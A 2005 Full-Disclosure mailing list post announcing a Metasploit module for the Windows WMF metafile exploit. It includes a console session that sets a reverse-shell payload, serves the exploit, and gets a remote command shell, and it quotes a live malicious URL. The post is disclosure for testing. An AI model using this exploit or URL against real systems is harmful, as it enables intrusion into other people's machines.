[Full-disclosure] Someone wasted a nice bug on spyware...
In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>


On Tuesday 27 December 2005 14:20, noemailpls@xxxxxxxxxxxxx wrote:
> Warning: the following URL successfully exploited a fully patched
> Windows XP system with a freshly updated Norton AntiVirus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The URL runs a .wmf and executes the virus; F-Secure will pick up the
> virus, Norton will not.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/